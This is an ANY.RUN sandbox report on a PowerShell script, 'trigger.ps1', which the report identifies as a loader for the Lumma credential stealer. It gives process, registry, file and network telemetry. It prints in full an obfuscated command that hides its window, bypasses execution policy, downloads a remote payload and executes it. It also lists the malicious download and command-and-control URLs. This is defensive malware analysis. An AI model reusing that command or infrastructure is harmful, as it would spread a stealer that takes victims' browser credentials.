File name:

trigger.ps1

Full analysis: https://app.any.run/tasks/9a401dea-248e-4761-aab2-925c6bbe3dd3
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 22, 2025, 18:01:11
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
lumma
stealer
exfiltration
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (1638), with no line terminators
MD5:

D208A8A732F7B97470B45B3003650A98

SHA1:

89C1A8C9F3A24D631BD698334EFF77986D86775E

SHA256:

88DDCE84CCA926B6DBBAABA96C86E6BE8D5A96EBAFE249C5E26F9A4573807288

SSDEEP:

48:9337UHVK6Zzvl7V/wIaDAsueAsKXnFEm/3NB:BOK65f4g7XnFDdB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1988)

    • Changes powershell execution policy (Unrestricted)

      • powershell.exe (PID: 1988)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 2676)

    • LUMMA mutex has been found

      • powershell.exe (PID: 4512)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 2676)

    • LUMMA has been detected (SURICATA)

      • powershell.exe (PID: 4512)

    • LUMMA has been detected (YARA)

      • powershell.exe (PID: 4512)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 4512)

    • Steals credentials from Web Browsers

      • powershell.exe (PID: 4512)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 2676)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 1988)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2676)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2676)

    • Creates new GUID (POWERSHELL)

      • powershell.exe (PID: 2676)

    • There is functionality for taking screenshot (YARA)

      • powershell.exe (PID: 4512)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 2676)

    • Checks proxy server information

      • powershell.exe (PID: 2676)

    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 1988)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 2676)

    • Creates a byte array (POWERSHELL)

      • powershell.exe (PID: 2676)

    • Manual execution by a user

      • powershell.exe (PID: 4512)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2676)

    • Creates files in the program directory

      • powershell.exe (PID: 4512)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2676)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
120
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs #LUMMA powershell.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
1988"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\trigger.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2676"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -Command SV 6h 'https://c1.bagelcoexist.tech/absfarad.enc';Set-Item Variable:/B 'Net.WebClient';gdr -*;Set-Item Variable:/H (.$ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Get-Member)[6].Name)|Get-Member|Where{$_.Name -like 'G*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).PsObject.Methods|Where{$_.Name -like '*Com*e'}).Name).Invoke('*w-*ct',$TRUE,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GCI Variable:B).Value);SV 7l ((((LS Variable:H).Value|Get-Member)|Where{$_.Name -like '*wn*d*g'}).Name);.([ScriptBlock]::Create((LS Variable:H).Value.((GI Variable:7l).Value).Invoke((LS Variable:\6h).Value))) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
3796\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4320\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4512"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\msvcp_win.dll
Total events
13 081
Read events
13 067
Write events
14
Delete events
0

Modification events

(PID) Process:(2676) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2676) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2676) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2676) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2676) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2676) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2676) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2676) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2676) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2676) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
18
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
1988powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:2ABA35B036568DD55F0346E415A27C93
SHA256:C7327472003A57CF1754ABA4CB91E43CE57A016F3B9905DF9973DF1846E361AF
2676powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_frt3g3op.pvf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1988powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:F1FEEA70AA34045EA797517346C42426
SHA256:448211EAE65548E451D3732C99C3E76A6B15CCE087DC5A04BAA3E09CAA0DBCFC
4512powershell.exeC:\ProgramData\9A2E843CBBDBA2E2.dat
MD5:
SHA256:
4512powershell.exeC:\ProgramData\7551184A8DD6F792.datbinary
MD5:A45465CDCDC6CB30C8906F3DA4EC114C
SHA256:4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
1988powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1381f5.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
2676powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:03B2BFD0E9FA09284B7B6BE80AB70FD7
SHA256:92D1F3A86A8E17CEC98840CA2D291E2E073147448E6C459792FA68F0944ABF9D
1988powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MK7IXV6KNXVG6IL9CFMI.tempbinary
MD5:F1FEEA70AA34045EA797517346C42426
SHA256:448211EAE65548E451D3732C99C3E76A6B15CCE087DC5A04BAA3E09CAA0DBCFC
4512powershell.exeC:\ProgramData\D41A122F4FC512BA.datbinary
MD5:F6C33AC5E1032A0873BE7BFC65169287
SHA256:D97895CEDED32E33D57BDCACCDBE144E58AA87AF4D2F8855D630286CE30A8D83
4512powershell.exeC:\ProgramData\A8150BA35C751D7D.datbinary
MD5:0FF3BCDD0BE077B9EB8194B5C09F453C
SHA256:225D669E47EB14D8C969799C92AAEF27B66CD984872EA09284E48DB46521E651
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
28
DNS requests
10
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
svchost.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
104.21.96.1:443
https://c1.bagelcoexist.tech/absfarad.enc
unknown
text
3.14 Mb
GET
200
104.21.48.1:443
https://download.bagelcoexist.tech/83446d72b7e5eb481b946a907787baf7.bin
unknown
executable
8.36 Mb
POST
200
104.21.20.51:443
https://potentiashelt.site/api
unknown
text
2 b
malicious
POST
200
104.21.20.51:443
https://potentiashelt.site/api
unknown
text
16 b
malicious
POST
200
172.67.191.134:443
https://potentiashelt.site/api
unknown
text
16 b
malicious
POST
200
104.21.20.51:443
https://potentiashelt.site/api
unknown
text
16 b
malicious
POST
200
104.21.20.51:443
https://potentiashelt.site/api
unknown
text
16 b
malicious
POST
200
172.67.191.134:443
https://potentiashelt.site/api
unknown
text
48 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2.23.227.215:443
www.bing.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
5496
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
svchost.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
4712
MoUsoCoreWorker.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
5496
svchost.exe
23.219.150.101:80
www.microsoft.com
AKAMAI-AS
CL
whitelisted
3976
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2676
powershell.exe
104.21.96.1:443
c1.bagelcoexist.tech
CLOUDFLARENET
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.23.227.215
  • 2.23.227.208
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
google.com
  • 142.250.184.206
whitelisted
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
whitelisted
www.microsoft.com
  • 23.219.150.101
whitelisted
c1.bagelcoexist.tech
  • 104.21.96.1
  • 104.21.112.1
  • 104.21.80.1
  • 104.21.32.1
  • 104.21.16.1
  • 104.21.64.1
  • 104.21.48.1
unknown
download.bagelcoexist.tech
  • 104.21.112.1
  • 104.21.48.1
  • 104.21.96.1
  • 104.21.16.1
  • 104.21.32.1
  • 104.21.80.1
  • 104.21.64.1
unknown
potentiashelt.site
  • 104.21.20.51
  • 172.67.191.134
malicious
self.events.data.microsoft.com
  • 52.168.117.168
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4512
powershell.exe
A Network Trojan was detected
STEALER [ANY.RUN] Lumma Stealer TLS Connection
A Network Trojan was detected
ET MALWARE Lumma Stealer Related Activity
A Network Trojan was detected
ET MALWARE Lumma Stealer CnC Host Checkin
Malware Command and Control Activity Detected
STEALER [ANY.RUN] Win32/Lumma Stealer Check-In
A Network Trojan was detected
ET MALWARE Lumma Stealer CnC Host Checkin
Malware Command and Control Activity Detected
ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration
Malware Command and Control Activity Detected
STEALER [ANY.RUN] Win32/Lumma Stealer Exfiltration
A Network Trojan was detected
ET MALWARE Lumma Stealer CnC Host Checkin
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
trigger.ps1